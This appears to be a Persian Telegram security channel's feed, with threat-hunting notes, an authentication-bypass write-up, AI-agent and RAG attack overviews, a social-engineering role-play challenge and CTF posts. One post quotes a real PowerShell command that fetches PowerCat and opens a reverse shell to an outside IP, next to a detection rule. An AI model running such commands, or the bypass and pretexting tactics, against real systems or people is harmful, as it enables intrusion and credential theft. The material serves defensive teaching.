بایپس احراز هویت از طریق Forged Session Cookie
(مرکز مدیریت فایروال امن سیسکو)
تحلیل:
- فقط وجود کوکی CGISESSID را بررسی میکند.
- اما بررسی نمی کند که آیا شناسه سشن معتبر، فعال و مرتبط با یک کاربر احراز هویت شده است یا خیر.
تاثیر:
یک مهاجم می تواند یک مقدار دلخواه یا پیش فرض مانند csm_processes را ارائه دهد تا از هدایت به صفحه /ui/login جلوگیری کند و به منابع محافظت شده دسترسی غیرمجاز پیدا کند.
پس اگر واقعاً از خواندن مطالب اینچنینی لذت میبرید، لطفاً حمایت خود را نشان دهید 🔥
@TryHackBox
(مرکز مدیریت فایروال امن سیسکو)
تحلیل:
- فقط وجود کوکی CGISESSID را بررسی میکند.
- اما بررسی نمی کند که آیا شناسه سشن معتبر، فعال و مرتبط با یک کاربر احراز هویت شده است یا خیر.
تاثیر:
یک مهاجم می تواند یک مقدار دلخواه یا پیش فرض مانند csm_processes را ارائه دهد تا از هدایت به صفحه /ui/login جلوگیری کند و به منابع محافظت شده دسترسی غیرمجاز پیدا کند.
پس اگر واقعاً از خواندن مطالب اینچنینی لذت میبرید، لطفاً حمایت خود را نشان دهید 🔥
@TryHackBox
🔥24👍2❤1
Forwarded from TryHackBox ( AI Security )
چهار گروه بدافزار، پلیس پاکستان را با استفاده از PlugX، ShadowPad، Remcos و Cobalt Strike مورد هدف قرار دادند.
محققان امنیت سایبری، جزئیاتی از فعالیتهای جاسوسی سایبری مداوم علیه چندین سازمان پلیس پاکستان را فاش کردند. این فعالیتها توسط گروههایی از هکرها انجام شده است که احتمالاً با چین و هند مرتبط هستند، و این حملات از فوریه 2024 تا آوریل 2026 ادامه داشته است.
https://thehackernews.com/2026/07/hackers-weaponize-balochistan-police.html
@RadioZeroPod
@TryHackBoxStory
@TryHackBoxOfficial
@TryHackBox
محققان امنیت سایبری، جزئیاتی از فعالیتهای جاسوسی سایبری مداوم علیه چندین سازمان پلیس پاکستان را فاش کردند. این فعالیتها توسط گروههایی از هکرها انجام شده است که احتمالاً با چین و هند مرتبط هستند، و این حملات از فوریه 2024 تا آوریل 2026 ادامه داشته است.
https://thehackernews.com/2026/07/hackers-weaponize-balochistan-police.html
@RadioZeroPod
@TryHackBoxStory
@TryHackBoxOfficial
@TryHackBox
❤6
در حال تشکیل یک تیم داوطلبانه کوچک برای توسعه یک پلتفرم در حوزه امنیت سایبری هستیم. پروژه در مرحله شروع قرار داره و میخوایم اعضای اصلی تیم رو از همین ابتدا کنار هم جمع کنیم تا مسیر رشد پروژه رو با هم بسازیم.
در حال حاضر، برای این نقش ها به صورت مشخص نیاز داریم:
اگر در یکی از این حوزه ها فعالیت میکنید یا میخواید روی یک پروژه واقعی تجربه بگیرید، خوشحال میشویم باهم صحبت کنیم.
چرا این همکاری میتونه ارزشمند باشه؟
این همکاری در حال حاضر داوطلبانه است. هدف ما در این مرحله، ساخت یک محصول حرفهای و کسب تجربه و سابقه کاری واقعی برای همه اعضای تیمه.
🔴 جهت ارتباط با ما به پشتیبانی پیام دهید :
@ThbxSupport
در حال حاضر، برای این نقش ها به صورت مشخص نیاز داریم:
- Front-end Development
- Back-end Development
- Database
- DevOps و Cloud
اگر در یکی از این حوزه ها فعالیت میکنید یا میخواید روی یک پروژه واقعی تجربه بگیرید، خوشحال میشویم باهم صحبت کنیم.
چرا این همکاری میتونه ارزشمند باشه؟
✅ تجربه عملی کار روی یک پروژه واقعی، از ایده تا انتشار
✅ همکاری با یک تیم هدفمند در حوزه امنیت سایبری و توسعه نرمافزار
✅ ثبت نقش شما در صفحه تیم پروژه (Contributor/Team Member)
✅ گواهی همکاری پس از مشارکت مؤثر
✅ امکان استفاده از پروژه در رزومه، LinkedIn و GitHub
✅ اولویت برای همکاری های بلندمدت در صورت رشد پروژه
این همکاری در حال حاضر داوطلبانه است. هدف ما در این مرحله، ساخت یک محصول حرفهای و کسب تجربه و سابقه کاری واقعی برای همه اعضای تیمه.
🔴 جهت ارتباط با ما به پشتیبانی پیام دهید :
@ThbxSupport
👍6👎6
Hacking Scada TryHackBox.pdf
936.6 KB
هک سیستم های SCADA : پیداکردن سیستم های SCADA با استفاده از Censys
همانطور که میدانید، سیستم های SCADA/ICS در سراسر جهان به طور مداوم مورد حمله قرار میگیرند. این سیستم های صنعتی هستند که در برخی موارد، میتوانند بر اقتصاد یک کشور تأثیر بگذارند و هدف اصلی در هر جنگ سایبری محسوب می شوند. پیداکردن آن ها با استفاده از ابزارهای مختلف (nmap / Shodan / و غیره) نسبتاً آسان است.
اگر از این دست پست ها را دوست دارید علاقه خود را با 🔥نشان دهید.
@TryHackBox
@TryHackBoxofficial
همانطور که میدانید، سیستم های SCADA/ICS در سراسر جهان به طور مداوم مورد حمله قرار میگیرند. این سیستم های صنعتی هستند که در برخی موارد، میتوانند بر اقتصاد یک کشور تأثیر بگذارند و هدف اصلی در هر جنگ سایبری محسوب می شوند. پیداکردن آن ها با استفاده از ابزارهای مختلف (nmap / Shodan / و غیره) نسبتاً آسان است.
اگر از این دست پست ها را دوست دارید علاقه خود را با 🔥نشان دهید.
@TryHackBox
@TryHackBoxofficial
🔥27❤9👍3👎1
Forwarded from رادیو زیرو پاد
📌 برگزاری جلسه ویس چت :
با درود خدمت دوستان و همراهان عزیز،
در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسهای تخصصی و آموزشی در خصوص زمینه SOC به صورت ویس چت برگزار کنیم.
🎙 مهمان ویژه:
👤 مهندس : مهتاب کسائی
📅 زمان برگزاری: امشب
📍 پلتفرم: ویس چت تلگرام
🕗 ساعت : 20:00
🔖 لینک جلسه :
🎙 قسمت اول
⁉️ موضوعات ما :
◾️زندگی روزمره یک SOC Analyst/Security Engineer
🔔 نکته مهم:
جهت شرکت به موقع جلسه، حتماً کانال تلگرام را چک کنید تا از این جلسه جا نمونید .
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🆔 @RadioZeroPod
🆔 @TryHackBox
با درود خدمت دوستان و همراهان عزیز،
در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسهای تخصصی و آموزشی در خصوص زمینه SOC به صورت ویس چت برگزار کنیم.
🎙 مهمان ویژه:
👤 مهندس : مهتاب کسائی
📅 زمان برگزاری: امشب
📍 پلتفرم: ویس چت تلگرام
🕗 ساعت : 20:00
🔖 لینک جلسه :
🎙 قسمت اول
⁉️ موضوعات ما :
◾️زندگی روزمره یک SOC Analyst/Security Engineer
🔔 نکته مهم:
جهت شرکت به موقع جلسه، حتماً کانال تلگرام را چک کنید تا از این جلسه جا نمونید .
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🆔 @RadioZeroPod
🆔 @TryHackBox
❤7👎5🔥2👏1
یکی از قدیمی ترین و خطرناک ترین پروتکل ها که هنوز روی خیلی از دستگاه ها پیدا میشه.
دستورات حمله واقعی به Telnet رو ببینید 👇
https://x.com/i/status/2079051452673147071
دستورات حمله واقعی به Telnet رو ببینید 👇
https://x.com/i/status/2079051452673147071
X (formerly Twitter)
kaveh (@KavehxNet) on X
05 : پورت ۲۳ :: TELNET
دسترسی از راه دور Cleartext + Enumeration کاربران ایمیل و Relay
تلنت TELNET کاملاً بدون رمزنگاری است.
نام کاربری، رمز عبور و همه دستورات به صورت plaintext منتقل میشوند.
هنوز روی دستگاههای شبکه قدیمی، سیستمهای embedded و سرورهای…
دسترسی از راه دور Cleartext + Enumeration کاربران ایمیل و Relay
تلنت TELNET کاملاً بدون رمزنگاری است.
نام کاربری، رمز عبور و همه دستورات به صورت plaintext منتقل میشوند.
هنوز روی دستگاههای شبکه قدیمی، سیستمهای embedded و سرورهای…
👍4
🧩 گاهی اوقات، مجرمان سایبری تمایل دارند که دستگیر شوند. بیایید یک مثال دیگر و ابزاری را بررسی کنیم که من کمتر در حملات واقعی با آن مواجه شدهام.
🔖 طبق این گزارش، مهاجم از PowerShell برای دانلود و اجرای PowerCat استفاده کرده است
◾ یک ابزار متنباز، مشابه Netcat، برای اجرای یک شل معکوس:
همانطور که متوجه شدید، مهاجم نام ابزار را تغییر نداده است. و در بسیاری از موارد، این یک رویه رایج است. همین موضوع در مورد مخازن نیز صدق میکند.
مجرمان اغلب از PowerShell برای دانلود ابزارها از منابع رسمی استفاده می کنند.
بنابراین، این یک نکته مهم دیگر است که باید مستند شود و در هنگام جستجوی فعال و ایجاد منطق تشخیص، در نظر گرفته شود، به عنوان مثال:
فراموش نکنید که بلوک های اسکریپت نیز حاوی خطوط و توابع جالب زیادی هستند، فقط خود اسکریپت را بررسی کنید.
اگر از این دست پست ها را دوست دارید علاقه خود را با 🔥نشان دهید.
@TryHackBox
@TryHackBoxofficial
@AiTHB
@RadioZeroPod
🔖 طبق این گزارش، مهاجم از PowerShell برای دانلود و اجرای PowerCat استفاده کرده است
◾ یک ابزار متنباز، مشابه Netcat، برای اجرای یک شل معکوس:
powershell.exe -c IEX (New-Object System.Net.WebClient).DownloadString (‘hxxps://raw[.]githubusercontent[.]com/besimorhino/powercat/master/powercat.ps1’); powercat -c 154.17.26[.]41 -p 8080 -e cmd
همانطور که متوجه شدید، مهاجم نام ابزار را تغییر نداده است. و در بسیاری از موارد، این یک رویه رایج است. همین موضوع در مورد مخازن نیز صدق میکند.
مجرمان اغلب از PowerShell برای دانلود ابزارها از منابع رسمی استفاده می کنند.
بنابراین، این یک نکته مهم دیگر است که باید مستند شود و در هنگام جستجوی فعال و ایجاد منطق تشخیص، در نظر گرفته شود، به عنوان مثال:
event_type: "processcreatewin"
AND
cmdline: "powercat"
فراموش نکنید که بلوک های اسکریپت نیز حاوی خطوط و توابع جالب زیادی هستند، فقط خود اسکریپت را بررسی کنید.
اگر از این دست پست ها را دوست دارید علاقه خود را با 🔥نشان دهید.
@TryHackBox
@TryHackBoxofficial
@AiTHB
@RadioZeroPod
ASEC
Analysis of ShadowPad Attack Exploiting WSUS Remote Code Execution Vulnerability (CVE-2025-59287) - ASEC
Analysis of ShadowPad Attack Exploiting WSUS Remote Code Execution Vulnerability (CVE-2025-59287) ASEC
🔥20❤1
Forwarded from TryHackBox ( AI Security )
ا 🔖 : AI Agent Kill Chain را میتوان در هشت مرحله درک کرد.
🔥 اولین کانال فارسی زبان در AI Security .
@TryHackBox
@RadioZeroPod
@AiTHB
@TryHackBoxOfficial
ا▪️ : AI agent ها فقط چت بات نیستند.
آنها میتوانند استدلال کنند، برنامه ریزی کنند، ابزارها را فراخوانی کنند، به داده ها دسترسی پیدا کنند، با APIها تعامل داشته باشند و در سیستم های متصل، اقداماتی انجام دهند. این قابلیت، یک سطح حملهی جدید و یک kill chain جدید ایجاد می کند.
درس کلیدی ساده است: AI agentها هرگز نباید مثل اپلیکیشن های معمولی در نظر گرفته شوند.
آنها به دسترسی سختگیرانهی least-privilege، تأیید انسانی برای اقدامات پرریسک، tool allowlists، اجرای ایزوله (isolated execution)، credentials کوتاه مدت، دفاع در برابر prompt injection و ثبت کامل audit logging نیاز دارند.
با گسترش استفادهی سازمانها از agentic AI، فقط ایمن سازی مدل کافی نخواهد بود.
باید خودِ agent، identity آن، tools آن، memory آن، دادههایش و هر سیستمی که به آن دسترسی دارد را ایمن کنید.
🔥 اولین کانال فارسی زبان در AI Security .
@TryHackBox
@RadioZeroPod
@AiTHB
@TryHackBoxOfficial
❤6
⭕ سری چالش های SE : هک انسان 1/20
📌 چالش : "تماس IT پشتیبانی"
سناریو:
❓ سوال:
⚠️ این چلنج فقط برای آموزش تشخیص و دفاع در برابر مهندسی اجتماعیه، نه اجرای واقعی روی افراد یا سازمانهای واقعی
@TryHackBox
#مهندسی_اجتماعی
📌 چالش : "تماس IT پشتیبانی"
سناریو:
شما درحال مهندسی اجتماعی هستید و هدفتون دسترسی به اطلاعات داخلی یک شرکت فرضی به نام "Datanova" هست. شما به عنوان یک "کارمند پشتیبانی IT" با خانم/آقای میترا شاهینی، منشی بخش مالی، تماس میگیرید.
📌 هدف: گرفتن یوزرنیم و ریست پسورد ایمیلش (بدون اینکه شک کنه).
📓 اطلاعات از پیش:
◾ شما اسم مدیرش (سهراب فریدونی) رو از لینکدین پیدا کردید.
◾ میدونید شرکت هفته پیش یک آپدیت سیستمی داشته.
◾میترا معمولاً ساعت ۹ صبح سرکاره.
❓ سوال:
> شما چه دیالوگ و استراتژی ای برای این تماس استفاده می کنید تا میترا بهتون اعتماد کنه؟ (متن دقیق مکالمه یا حداقل ۳-۴ تاکتیکی که به کار میبرید رو تو کامنت بنویسید).
⚠️ این چلنج فقط برای آموزش تشخیص و دفاع در برابر مهندسی اجتماعیه، نه اجرای واقعی روی افراد یا سازمانهای واقعی
@TryHackBox
#مهندسی_اجتماعی
❤5👍1
Forwarded from TryHackBox ( AI Security )
معماری RAG: طراحی، امنیت و حملات
RAG (Retrieval-Augmented Generation) یک معماری ترکیبی است که بازیابی اطلاعات (Retrieval) را با تولید زبان طبیعی (Generation) ادغام میکند تا پاسخهای دقیقتر و مبتنی بر داده تولید کند.
اجزای اصلی معماری
1. Query Encoder: تبدیل پرسش کاربر به Vector Embedding معنایی.
2. Retriever: جستجو در Vector Database (مانند FAISS یا ChromaDB) برای یافتن اسناد مرتبط.
3. Generator: مدل زبانی (مانند GPT یا BART) که پاسخ را بر اساس اسناد بازیابیشده تولید میکند.
4. Knowledge Base: مخزن خارجی اسناد متنی که دانش سیستم را بهروز نگه میدارد.
فرآیند عملیاتی
کاربر سوال میپرسد → سوال به بردار تبدیل میشود → Retriever اسناد مرتبط را بازیابی میکند → Generator پاسخ نهایی را تولید میکند.
حملات رایج به RAG
1. Knowledge Poisoning: تزریق دادههای مخرب به پایگاه دانش برای انحراف پاسخها.
2. Indirect Prompt Injection: دستکاری ورودی کاربر برای تغییر رفتار Retriever یا Generator.
3. Cross-Tenant Leakage: دسترسی غیرمجاز به دادههای کاربران دیگر در سیستمهای چندمستاجره.
چالشهای امنیتی
- Data Integrity: اطمینان از صحت و اعتبار اسناد بازیابیشده.
- Access Control: جلوگیری از دسترسی به دادههای حساس یا طبقهبندیشده.
- Hallucination Mitigation: کاهش توهمهای مدل با استفاده از منابع معتبر.
معماری RAG با ترکیب Semantic Search و Language Generation، پل میان دانش خارجی و قدرت تولید مدلهای زبانی است، اما نیازمند لایههای دفاعی چندگانه برای مقابله با حملات نوظهور است.
🔥 اولین کانال فارسی زبان در AI Security .
@TryHackBox
@RadioZeroPod
@AiTHB
@TryHackBoxOfficial
RAG (Retrieval-Augmented Generation) یک معماری ترکیبی است که بازیابی اطلاعات (Retrieval) را با تولید زبان طبیعی (Generation) ادغام میکند تا پاسخهای دقیقتر و مبتنی بر داده تولید کند.
اجزای اصلی معماری
1. Query Encoder: تبدیل پرسش کاربر به Vector Embedding معنایی.
2. Retriever: جستجو در Vector Database (مانند FAISS یا ChromaDB) برای یافتن اسناد مرتبط.
3. Generator: مدل زبانی (مانند GPT یا BART) که پاسخ را بر اساس اسناد بازیابیشده تولید میکند.
4. Knowledge Base: مخزن خارجی اسناد متنی که دانش سیستم را بهروز نگه میدارد.
فرآیند عملیاتی
کاربر سوال میپرسد → سوال به بردار تبدیل میشود → Retriever اسناد مرتبط را بازیابی میکند → Generator پاسخ نهایی را تولید میکند.
حملات رایج به RAG
1. Knowledge Poisoning: تزریق دادههای مخرب به پایگاه دانش برای انحراف پاسخها.
2. Indirect Prompt Injection: دستکاری ورودی کاربر برای تغییر رفتار Retriever یا Generator.
3. Cross-Tenant Leakage: دسترسی غیرمجاز به دادههای کاربران دیگر در سیستمهای چندمستاجره.
چالشهای امنیتی
- Data Integrity: اطمینان از صحت و اعتبار اسناد بازیابیشده.
- Access Control: جلوگیری از دسترسی به دادههای حساس یا طبقهبندیشده.
- Hallucination Mitigation: کاهش توهمهای مدل با استفاده از منابع معتبر.
معماری RAG با ترکیب Semantic Search و Language Generation، پل میان دانش خارجی و قدرت تولید مدلهای زبانی است، اما نیازمند لایههای دفاعی چندگانه برای مقابله با حملات نوظهور است.
🔥 اولین کانال فارسی زبان در AI Security .
@TryHackBox
@RadioZeroPod
@AiTHB
@TryHackBoxOfficial
❤5
Forwarded from Try Hack Box
Media is too big
VIEW IN TELEGRAM
📌 دوره: راهنمای جامع ابزار Mimikatz
💢 توضیحات دوره: Mimikatz بدون شک یکی از مهم ترین و موثرترین ابزارهایی است که در دنیای امنیت سایبری و عملیات تیم قرمز مورد استفاده قرار می گیرد.این ابزار توسط برنامه نویس فرانسوی Benjamin Delpy ایجاد شد.او در ابتدا Mimikatz را برای یادگیری عمیق تر زبان C و درک بهتر مکانیزم های امنیتی ویندوز توسعه داد.
این ابزار با بهره برداری هوشمند از ضعف های موجود در معماری ویندوز،مجموعهای از حملات مهم و پرکاربرد را به صورت یکپارچه و آماده ارائه می دهد. Mimikatz کار را برای متخصصان بسیار آسان تر کرده است؛به شکلی که بدون نیاز به دانش بسیار تخصصی از ساختارهای داخلی،می توان از آن برای گسترش دسترسی در شبکه های مبتنی بر ویندوز استفاده کرد.این ابزار همچنان فعالانه به روزرسانی میشود و تکنیک های جدید به آن اضافه می گردد.
📌 توضیحات کامل
◽مدرس : مهندس سجاد تیموری
◽مدت زمان دوره : ۵ ساعت ۲۰ دقیقه
◻ دوره : آفلاین
⭕ دوره دارای گروه پشتیبانی می باشد.
💰قیمت : ۲,۰۰۰,۰۰۰ تومان
💰 با تخفیف ویژه : ۱,۲۵۰,۰۰۰ تومان
📌 جهت خرید،به ایدی زیر پیام دهید:
@ThbxSupport
Group
@TryHackBox
💢 توضیحات دوره: Mimikatz بدون شک یکی از مهم ترین و موثرترین ابزارهایی است که در دنیای امنیت سایبری و عملیات تیم قرمز مورد استفاده قرار می گیرد.این ابزار توسط برنامه نویس فرانسوی Benjamin Delpy ایجاد شد.او در ابتدا Mimikatz را برای یادگیری عمیق تر زبان C و درک بهتر مکانیزم های امنیتی ویندوز توسعه داد.
این ابزار با بهره برداری هوشمند از ضعف های موجود در معماری ویندوز،مجموعهای از حملات مهم و پرکاربرد را به صورت یکپارچه و آماده ارائه می دهد. Mimikatz کار را برای متخصصان بسیار آسان تر کرده است؛به شکلی که بدون نیاز به دانش بسیار تخصصی از ساختارهای داخلی،می توان از آن برای گسترش دسترسی در شبکه های مبتنی بر ویندوز استفاده کرد.این ابزار همچنان فعالانه به روزرسانی میشود و تکنیک های جدید به آن اضافه می گردد.
📌 توضیحات کامل
◽مدرس : مهندس سجاد تیموری
◽مدت زمان دوره : ۵ ساعت ۲۰ دقیقه
◻ دوره : آفلاین
⭕ دوره دارای گروه پشتیبانی می باشد.
💰
💰 با تخفیف ویژه : ۱,۲۵۰,۰۰۰ تومان
📌 جهت خرید،به ایدی زیر پیام دهید:
@ThbxSupport
Group
@TryHackBox
👍3👎2
دوستان اگر علاقه مند به فعالیت در تیم ما هستید البته به صورت داوطلب ، پیام دهید :
@ThbxSupport
@ThbxSupport
👎3
TryHackBox CTF 1.zip
26.5 KB
TryHackBox #CTF #1
سطح : خیلی آسان
یه چالش امنیت سایبری آماده کردیم! دو فایل زیر رو دانلود کنید و فلگ رو پیدا کنید 👇
راهنمای چالش:
ارسال فلگ به :
@Unique_exploitbot
#CTF #TryHackBox #CyberSecurity
@TryHackBox
سطح : خیلی آسان
یه چالش امنیت سایبری آماده کردیم! دو فایل زیر رو دانلود کنید و فلگ رو پیدا کنید 👇
/ TryHackBox CTF 1.Zip
|
| __ tryhackbox_challenge.png
|_ _ challenge.zip
راهنمای چالش:
۱. فایل challenge.zip رمزدار هست.فرمت فلگ:
۲. رمز داخل فایل tryhackbox_challenge.png هست دقت کنید که همه چیز تو یه عکس همیشه فقط ظاهرش نیست .
۳. وقتی زیپ رو باز کردید، داخلش یه متن هست که هنوز فلگ نهایی نیست یه مرحله دیکد دیگه لازمه.
TryHackBox{...}
ارسال فلگ به :
@Unique_exploitbot
#CTF #TryHackBox #CyberSecurity
@TryHackBox
❤2
فراخوان همکاری داوطلبانه طراح UI/UX
در حال توسعه یک پلتفرم آموزشی امنیت سایبری هستیم و برای تکمیل تیم، از یک طراح UI/UX دعوت میکنیم بهصورت داوطلبانه در کنار ما همکاری کند.
هدف ما طراحی یک رابط کاربری مدرن، ساده و کاربرپسند است که تجربهای حرفهای برای کاربران و علاقهمندان حوزه امنیت سایبری فراهم کند.
مهارتهای موردنیاز
تسلط بر طراحی رابط کاربری (UI)
آشنایی با اصول تجربه کاربری (UX)
توانایی کار با Figma یا ابزارهای مشابه
طراحی صفحات ریسپانسیو و مدرن
آشنایی با Design System و Componentها
اگر به ساخت یک پروژه واقعی، توسعه رزومه و همکاری در کنار یک تیم فعال در حوزه امنیت سایبری علاقهمند هستید، خوشحال میشویم در کنار ما باشید.
مزایای همکاری
ثبت نام و نقش شما در تیم پروژه و معرفی در بخش همکاران (پس از انتشار)
ساخت نمونهکار (Portfolio) واقعی و قابل ارائه
دریافت گواهی همکاری پس از مشارکت مؤثر در پروژه
اولویت برای همکاری های آینده و پروژههای تجاری و درآمدزا
امکان شبکه سازی
مشارکت در ساخت محصولی که توسط هزاران کاربر مورد استفاده قرار خواهد گرفت
این همکاری در حال حاضر داوطلبانه است و هدف، ساخت یک پلتفرم آموزشی ارزشمند برای جامعه امنیت سایبری است. اعضای اولیه تیم، نقش مهمی در شکلگیری و توسعه آینده این پروژه خواهند داشت و در صورت تبدیل پروژه به یک فعالیت تجاری، اعضای فعال تیم در اولویت همکاری های بعدی خواهند بود.
در صورت تمایل به همکاری، لطفاً از طریق پیام خصوصی با ما در ارتباط باشید.
@ThbxSupport
در حال توسعه یک پلتفرم آموزشی امنیت سایبری هستیم و برای تکمیل تیم، از یک طراح UI/UX دعوت میکنیم بهصورت داوطلبانه در کنار ما همکاری کند.
هدف ما طراحی یک رابط کاربری مدرن، ساده و کاربرپسند است که تجربهای حرفهای برای کاربران و علاقهمندان حوزه امنیت سایبری فراهم کند.
مهارتهای موردنیاز
تسلط بر طراحی رابط کاربری (UI)
آشنایی با اصول تجربه کاربری (UX)
توانایی کار با Figma یا ابزارهای مشابه
طراحی صفحات ریسپانسیو و مدرن
آشنایی با Design System و Componentها
اگر به ساخت یک پروژه واقعی، توسعه رزومه و همکاری در کنار یک تیم فعال در حوزه امنیت سایبری علاقهمند هستید، خوشحال میشویم در کنار ما باشید.
مزایای همکاری
ثبت نام و نقش شما در تیم پروژه و معرفی در بخش همکاران (پس از انتشار)
ساخت نمونهکار (Portfolio) واقعی و قابل ارائه
دریافت گواهی همکاری پس از مشارکت مؤثر در پروژه
اولویت برای همکاری های آینده و پروژههای تجاری و درآمدزا
امکان شبکه سازی
مشارکت در ساخت محصولی که توسط هزاران کاربر مورد استفاده قرار خواهد گرفت
این همکاری در حال حاضر داوطلبانه است و هدف، ساخت یک پلتفرم آموزشی ارزشمند برای جامعه امنیت سایبری است. اعضای اولیه تیم، نقش مهمی در شکلگیری و توسعه آینده این پروژه خواهند داشت و در صورت تبدیل پروژه به یک فعالیت تجاری، اعضای فعال تیم در اولویت همکاری های بعدی خواهند بود.
در صورت تمایل به همکاری، لطفاً از طریق پیام خصوصی با ما در ارتباط باشید.
@ThbxSupport
❤5
TryHackBox_Challenge01.zip
6.6 KB
🚩 TryHackBox | چالش #1: Broken Login Portal
📂 دسته: Web / SQL Injection
🎯 سطح: متوسط
🏳️ فرمت فلگ: THB{...}
سناریو:
فایل های چالش: 👇 (ضمیمه همین پست)
شامل سورس اپ + Dockerfile برای اجرای آسان + README کامل با راهنمای راهاندازی.
نحوه اجرا:
یا
بعد برید به: http://localhost:5000
فلگ رو دقیقاً با فرمت THB{...} به بات ارسال کنید.
@Unique_exploitbot
راهنمایی هم داخل README هست، اگه گیر کردید نگاه کنید.
موفق باشید!
نظرتون راجب این ctf کامنت کنید .
@TryHackBox
📂 دسته: Web / SQL Injection
🎯 سطح: متوسط
🏳️ فرمت فلگ: THB{...}
سناریو:
یک شرکت فرضی یک پورتال مدیریت داخلی ساخته و مدعیه که ورودی های کاربر رو فیلتر کرده و امن هست. وظیفه شما به عنوان پنتستر: نشون بدید این ادعا درست نیست.
هدف نهایی: پیدا کردن فلگ مخفی شده در سیستم.
فایل های چالش: 👇 (ضمیمه همین پست)
شامل سورس اپ + Dockerfile برای اجرای آسان + README کامل با راهنمای راهاندازی.
نحوه اجرا:
docker build -t tryhackbox-c1 .
docker run -p 5000:5000 tryhackbox-c1
یا
pip install -r requirements.txt
python3 app.py
بعد برید به: http://localhost:5000
فلگ رو دقیقاً با فرمت THB{...} به بات ارسال کنید.
@Unique_exploitbot
راهنمایی هم داخل README هست، اگه گیر کردید نگاه کنید.
موفق باشید!
نظرتون راجب این ctf کامنت کنید .
@TryHackBox
❤8